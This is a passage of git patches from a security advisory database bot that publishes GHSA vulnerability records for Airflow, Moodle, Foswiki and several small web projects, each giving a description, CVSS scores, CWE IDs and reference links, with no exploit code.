+++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-gfw7-2v73-69wg/GHSA-gfw7-2v73-69wg.json diff --git a/advisories/unreviewed/2026/02/GHSA-gfw7-2v73-69wg/GHSA-gfw7-2v73-69wg.json b/advisories/unreviewed/2026/02/GHSA-gfw7-2v73-69wg/GHSA-gfw7-2v73-69wg.json new file mode 100644 index 0000000000000..573b55331f43f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gfw7-2v73-69wg/GHSA-gfw7-2v73-69wg.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gfw7-2v73-69wg", + "modified": "2026-02-21T03:31:39Z", + "published": "2026-02-21T03:31:39Z", + "aliases": [ + "CVE-2025-65995" + ], + "details": "When a DAG failed during parsing, Airflow’s error-reporting in the UI could include the full kwargs passed to the operators. If those kwargs contained sensitive values (such as secrets), they might be exposed in the UI tracebacks to authenticated users who had permission to view that DAG. \n\nThe issue has been fixed in Airflow 3.1.4 and 2.11.1, and users are strongly advised to upgrade to prevent potential disclosure of sensitive information.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65995" + }, + { + "type": "WEB", + "url": "https://github.com/apache/airflow/pull/58252" + }, + { + "type": "WEB", + "url": "https://github.com/apache/airflow/pull/61883" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/1qzlrjo2wmlzs0rrgzgslj2pzkor0dr2" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2025/12/12/2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-209" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T03:15:57Z" + } +} \ No newline at end of file From 715a73bb5198ef53c08636e9663bfd904ab59ff1 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 21 Feb 2026 06:32:03 +0000 Subject: [PATCH 34/77] Publish Advisories GHSA-m4f3-qp2w-gwh6 GHSA-4782-773j-qvcq GHSA-4g4j-v56v-2w79 GHSA-6v46-p4rh-797h GHSA-7fj8-2w2v-gvp9 GHSA-96j8-mwhp-xmj4 GHSA-c7x9-pfw8-h942 GHSA-cg8j-5cr2-568q GHSA-chwj-wc69-jqxj GHSA-f678-w5rv-9j99 GHSA-ggxq-2mg9-8966 GHSA-rx5p-47h9-9hv2 GHSA-vjq9-53r9-j2x9 GHSA-w8g9-9cxr-c95j GHSA-x835-c867-m9pw --- .../GHSA-m4f3-qp2w-gwh6.json | 6 +- .../GHSA-4782-773j-qvcq.json | 25 ++++++++ .../GHSA-4g4j-v56v-2w79.json | 40 +++++++++++++ .../GHSA-6v46-p4rh-797h.json | 25 ++++++++ .../GHSA-7fj8-2w2v-gvp9.json | 60 +++++++++++++++++++ .../GHSA-96j8-mwhp-xmj4.json | 56 +++++++++++++++++ .../GHSA-c7x9-pfw8-h942.json | 25 ++++++++ .../GHSA-cg8j-5cr2-568q.json | 40 +++++++++++++ .../GHSA-chwj-wc69-jqxj.json | 25 ++++++++ .../GHSA-f678-w5rv-9j99.json | 25 ++++++++ .../GHSA-ggxq-2mg9-8966.json | 40 +++++++++++++ .../GHSA-rx5p-47h9-9hv2.json | 25 ++++++++ .../GHSA-vjq9-53r9-j2x9.json | 25 ++++++++ .../GHSA-w8g9-9cxr-c95j.json | 25 ++++++++ .../GHSA-x835-c867-m9pw.json | 56 +++++++++++++++++ 15 files changed, 497 insertions(+), 1 deletion(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-4782-773j-qvcq/GHSA-4782-773j-qvcq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4g4j-v56v-2w79/GHSA-4g4j-v56v-2w79.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6v46-p4rh-797h/GHSA-6v46-p4rh-797h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7fj8-2w2v-gvp9/GHSA-7fj8-2w2v-gvp9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-96j8-mwhp-xmj4/GHSA-96j8-mwhp-xmj4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c7x9-pfw8-h942/GHSA-c7x9-pfw8-h942.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cg8j-5cr2-568q/GHSA-cg8j-5cr2-568q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-chwj-wc69-jqxj/GHSA-chwj-wc69-jqxj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f678-w5rv-9j99/GHSA-f678-w5rv-9j99.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ggxq-2mg9-8966/GHSA-ggxq-2mg9-8966.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rx5p-47h9-9hv2/GHSA-rx5p-47h9-9hv2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vjq9-53r9-j2x9/GHSA-vjq9-53r9-j2x9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w8g9-9cxr-c95j/GHSA-w8g9-9cxr-c95j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x835-c867-m9pw/GHSA-x835-c867-m9pw.json diff --git a/advisories/github-reviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json b/advisories/github-reviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json index 791cac995443a..1db9a4e9fbe6d 100644 --- a/advisories/github-reviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json +++ b/advisories/github-reviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m4f3-qp2w-gwh6", - "modified": "2026-02-19T20:27:55Z", + "modified": "2026-02-21T06:30:15Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-24708" @@ -90,6 +90,10 @@ "type": "PACKAGE", "url": "https://github.com/openstack/nova" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00025.html" + }, { "type": "WEB", "url": "https://www.openwall.com/lists/oss-security/2026/02/17/7" diff --git a/advisories/unreviewed/2026/02/GHSA-4782-773j-qvcq/GHSA-4782-773j-qvcq.json b/advisories/unreviewed/2026/02/GHSA-4782-773j-qvcq/GHSA-4782-773j-qvcq.json new file mode 100644 index 0000000000000..ba5d530c52d6c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4782-773j-qvcq/GHSA-4782-773j-qvcq.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4782-773j-qvcq", + "modified": "2026-02-21T06:30:15Z", + "published": "2026-02-21T06:30:15Z", + "aliases": [ + "CVE-2026-27530" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27530" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T05:17:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4g4j-v56v-2w79/GHSA-4g4j-v56v-2w79.json b/advisories/unreviewed/2026/02/GHSA-4g4j-v56v-2w79/GHSA-4g4j-v56v-2w79.json new file mode 100644 index 0000000000000..13734acd5f398 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4g4j-v56v-2w79/GHSA-4g4j-v56v-2w79.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4g4j-v56v-2w79", + "modified": "2026-02-21T06:30:16Z", + "published": "2026-02-21T06:30:16Z", + "aliases": [ + "CVE-2026-26046" + ], + "details": "A vulnerability was found in a Moodle TeX filter administrative setting where insufficient sanitization of configuration input could allow command injection. On sites where the TeX filter is enabled and ImageMagick is installed, a maliciously crafted setting value entered by an administrator could result in unintended system command execution. While exploitation requires administrative privileges, successful compromise could affect the entire Moodle server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26046" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2026-26046" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440903" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T06:17:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6v46-p4rh-797h/GHSA-6v46-p4rh-797h.json b/advisories/unreviewed/2026/02/GHSA-6v46-p4rh-797h/GHSA-6v46-p4rh-797h.json new file mode 100644 index 0000000000000..40f043cc37639 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6v46-p4rh-797h/GHSA-6v46-p4rh-797h.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6v46-p4rh-797h", + "modified": "2026-02-21T06:30:15Z", + "published": "2026-02-21T06:30:15Z", + "aliases": [ + "CVE-2026-27527" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27527" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T05:17:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7fj8-2w2v-gvp9/GHSA-7fj8-2w2v-gvp9.json b/advisories/unreviewed/2026/02/GHSA-7fj8-2w2v-gvp9/GHSA-7fj8-2w2v-gvp9.json new file mode 100644 index 0000000000000..5a24de2a6c271 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7fj8-2w2v-gvp9/GHSA-7fj8-2w2v-gvp9.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7fj8-2w2v-gvp9", + "modified": "2026-02-21T06:30:17Z", + "published": "2026-02-21T06:30:17Z", + "aliases": [ + "CVE-2026-2861" + ], + "details": "A vulnerability was detected in Foswiki up to 2.1.10. The affected element is an unknown function of the component Changes/Viewfile/Oops. The manipulation results in information disclosure. It is possible to launch the attack remotely. The exploit is now public and may be used. Upgrading to version 2.1.11 is sufficient to fix this issue. The patch is identified as 31aeecb58b64/d8ed86b10e46. Upgrading the affected component is recommended.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2861" + }, + { + "type": "WEB", + "url": "https://github.com/foswiki/distro/commit/31aeecb58b64" + }, + { + "type": "WEB", + "url": "https://foswiki.org/Tasks/Item15600" + }, + { + "type": "WEB", + "url": "https://foswiki.org/Tasks/Item15601" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347101" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347101" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753966" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T06:17:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-96j8-mwhp-xmj4/GHSA-96j8-mwhp-xmj4.json b/advisories/unreviewed/2026/02/GHSA-96j8-mwhp-xmj4/GHSA-96j8-mwhp-xmj4.json new file mode 100644 index 0000000000000..5af216df18918 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-96j8-mwhp-xmj4/GHSA-96j8-mwhp-xmj4.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-96j8-mwhp-xmj4", + "modified": "2026-02-21T06:30:16Z", + "published": "2026-02-21T06:30:16Z", + "aliases": [ + "CVE-2026-2860" + ], + "details": "A security vulnerability has been detected in feng_ha_ha/megagao ssm-erp and production_ssm up to 4288d53bd35757b27f2d070057aefb2c07bdd097. Impacted is an unknown function of the file EmployeeController.java. The manipulation leads to improper authorization. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. This product is distributed under two entirely different names. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2860" + }, + { + "type": "WEB", + "url": "https://github.com/megagao/production_ssm/issues/36" + }, + { + "type": "WEB", + "url": "https://github.com/megagao/production_ssm/issues/36#issue-3914626431" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347100" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347100" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754494" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T05:17:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c7x9-pfw8-h942/GHSA-c7x9-pfw8-h942.json b/advisories/unreviewed/2026/02/GHSA-c7x9-pfw8-h942/GHSA-c7x9-pfw8-h942.json new file mode 100644 index 0000000000000..6a2c0cd82fe5b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c7x9-pfw8-h942/GHSA-c7x9-pfw8-h942.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c7x9-pfw8-h942", + "modified": "2026-02-21T06:30:15Z", + "published": "2026-02-21T06:30:15Z", + "aliases": [ + "CVE-2026-27528" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27528" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T05:17:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cg8j-5cr2-568q/GHSA-cg8j-5cr2-568q.json b/advisories/unreviewed/2026/02/GHSA-cg8j-5cr2-568q/GHSA-cg8j-5cr2-568q.json new file mode 100644 index 0000000000000..1fc1fdf7fde09 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cg8j-5cr2-568q/GHSA-cg8j-5cr2-568q.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cg8j-5cr2-568q", + "modified": "2026-02-21T06:30:16Z", + "published": "2026-02-21T06:30:16Z", + "aliases": [ + "CVE-2026-26047" + ], + "details": "A denial-of-service vulnerability was identified in Moodle’s TeX formula editor. When rendering TeX content using mimetex, insufficient execution time limits could allow specially crafted formulas to consume excessive server resources. An authenticated user could abuse this behavior to degrade performance or cause service interruption.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26047" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2026-26047" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440905" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T06:17:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-chwj-wc69-jqxj/GHSA-chwj-wc69-jqxj.json b/advisories/unreviewed/2026/02/GHSA-chwj-wc69-jqxj/GHSA-chwj-wc69-jqxj.json new file mode 100644 index 0000000000000..b6b8c4365a4eb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-chwj-wc69-jqxj/GHSA-chwj-wc69-jqxj.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-chwj-wc69-jqxj", + "modified": "2026-02-21T06:30:16Z", + "published": "2026-02-21T06:30:16Z", + "aliases": [ + "CVE-2026-27531" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27531" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T05:17:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f678-w5rv-9j99/GHSA-f678-w5rv-9j99.json b/advisories/unreviewed/2026/02/GHSA-f678-w5rv-9j99/GHSA-f678-w5rv-9j99.json new file mode 100644 index 0000000000000..ea2fab6669051 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f678-w5rv-9j99/GHSA-f678-w5rv-9j99.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f678-w5rv-9j99", + "modified": "2026-02-21T06:30:15Z", + "published": "2026-02-21T06:30:15Z", + "aliases": [ + "CVE-2026-27529" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27529" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T05:17:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ggxq-2mg9-8966/GHSA-ggxq-2mg9-8966.json b/advisories/unreviewed/2026/02/GHSA-ggxq-2mg9-8966/GHSA-ggxq-2mg9-8966.json new file mode 100644 index 0000000000000..b148e03e302cb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ggxq-2mg9-8966/GHSA-ggxq-2mg9-8966.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ggxq-2mg9-8966", + "modified": "2026-02-21T06:30:16Z", + "published": "2026-02-21T06:30:16Z", + "aliases": [ + "CVE-2026-26045" + ], + "details": "A flaw was identified in Moodle’s backup restore functionality where specially crafted backup files were not properly validated during processing. If a malicious backup file is restored, it could lead to unintended execution of server-side code. Since restore capabilities are typically available to privileged users, exploitation requires authenticated access. Successful exploitation could result in full compromise of the Moodle server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26045" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2026-26045" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440901" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T06:16:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rx5p-47h9-9hv2/GHSA-rx5p-47h9-9hv2.json b/advisories/unreviewed/2026/02/GHSA-rx5p-47h9-9hv2/GHSA-rx5p-47h9-9hv2.json new file mode 100644 index 0000000000000..38c5ed7ac5e73 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rx5p-47h9-9hv2/GHSA-rx5p-47h9-9hv2.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rx5p-47h9-9hv2", + "modified": "2026-02-21T06:30:16Z", + "published": "2026-02-21T06:30:16Z", + "aliases": [ + "CVE-2026-27534" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27534" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T05:17:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjq9-53r9-j2x9/GHSA-vjq9-53r9-j2x9.json b/advisories/unreviewed/2026/02/GHSA-vjq9-53r9-j2x9/GHSA-vjq9-53r9-j2x9.json new file mode 100644 index 0000000000000..040c89dce81ae --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjq9-53r9-j2x9/GHSA-vjq9-53r9-j2x9.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjq9-53r9-j2x9", + "modified": "2026-02-21T06:30:16Z", + "published": "2026-02-21T06:30:16Z", + "aliases": [ + "CVE-2026-27532" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27532" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T05:17:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w8g9-9cxr-c95j/GHSA-w8g9-9cxr-c95j.json b/advisories/unreviewed/2026/02/GHSA-w8g9-9cxr-c95j/GHSA-w8g9-9cxr-c95j.json new file mode 100644 index 0000000000000..77b64472fd814 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w8g9-9cxr-c95j/GHSA-w8g9-9cxr-c95j.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w8g9-9cxr-c95j", + "modified": "2026-02-21T06:30:16Z", + "published": "2026-02-21T06:30:16Z", + "aliases": [ + "CVE-2026-27533" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27533" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T05:17:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x835-c867-m9pw/GHSA-x835-c867-m9pw.json b/advisories/unreviewed/2026/02/GHSA-x835-c867-m9pw/GHSA-x835-c867-m9pw.json new file mode 100644 index 0000000000000..5d63eb5fee125 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x835-c867-m9pw/GHSA-x835-c867-m9pw.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x835-c867-m9pw", + "modified": "2026-02-21T06:30:17Z", + "published": "2026-02-21T06:30:17Z", + "aliases": [ + "CVE-2026-2863" + ], + "details": "A flaw has been found in feng_ha_ha/megagao ssm-erp and production_ssm up to 4288d53bd35757b27f2d070057aefb2c07bdd097. The impacted element is the function deleteFile of the file FileServiceImpl.java. This manipulation causes path traversal. The attack can be initiated remotely. The exploit has been published and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. This product is distributed under two entirely different names. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2863" + }, + { + "type": "WEB", + "url": "https://github.com/megagao/production_ssm/issues/37" + }, + { + "type": "WEB", + "url": "https://github.com/megagao/production_ssm/issues/37#issue-3914979380" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347102" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347102" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754530" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T06:17:02Z" + } +} \ No newline at end of file From 1cb2f156da40a8fac57d4aff87e4f0ddecaf0bd1 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 21 Feb 2026 09:35:42 +0000 Subject: [PATCH 35/77] Publish Advisories GHSA-jxwf-hc6h-vhc7 GHSA-qj2h-hx88-46hp --- .../GHSA-jxwf-hc6h-vhc7.json | 56 +++++++++++++++++++ .../GHSA-qj2h-hx88-46hp.json | 56 +++++++++++++++++++ 2 files changed, 112 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-jxwf-hc6h-vhc7/GHSA-jxwf-hc6h-vhc7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qj2h-hx88-46hp/GHSA-qj2h-hx88-46hp.json diff --git a/advisories/unreviewed/2026/02/GHSA-jxwf-hc6h-vhc7/GHSA-jxwf-hc6h-vhc7.json b/advisories/unreviewed/2026/02/GHSA-jxwf-hc6h-vhc7/GHSA-jxwf-hc6h-vhc7.json new file mode 100644 index 0000000000000..95ec3ea18acc5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jxwf-hc6h-vhc7/GHSA-jxwf-hc6h-vhc7.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jxwf-hc6h-vhc7", + "modified": "2026-02-21T09:33:57Z", + "published": "2026-02-21T09:33:57Z", + "aliases": [ + "CVE-2026-2865" + ], + "details": "A vulnerability was found in itsourcecode Agri-Trading Online Shopping System 1.0. This impacts an unknown function of the file admin/productcontroller.php of the component HTTP POST Request Handler. Performing a manipulation of the argument Product results in sql injection. The attack may be initiated remotely. The exploit has been made public and could be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2865" + }, + { + "type": "WEB", + "url": "https://github.com/wan1yan/cve/issues/3" + }, + { + "type": "WEB", + "url": "https://itsourcecode.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347104" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347104" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754556" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T08:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qj2h-hx88-46hp/GHSA-qj2h-hx88-46hp.json b/advisories/unreviewed/2026/02/GHSA-qj2h-hx88-46hp/GHSA-qj2h-hx88-46hp.json new file mode 100644 index 0000000000000..e03291f779f03 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qj2h-hx88-46hp/GHSA-qj2h-hx88-46hp.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qj2h-hx88-46hp", + "modified": "2026-02-21T09:33:57Z", + "published": "2026-02-21T09:33:57Z", + "aliases": [ + "CVE-2026-2864" + ], + "details": "A vulnerability has been found in feng_ha_ha/megagao ssm-erp and production_ssm up to 4288d53bd35757b27f2d070057aefb2c07bdd097. This affects the function pictureDelete of the file PictureController.java. Such manipulation of the argument picName leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases 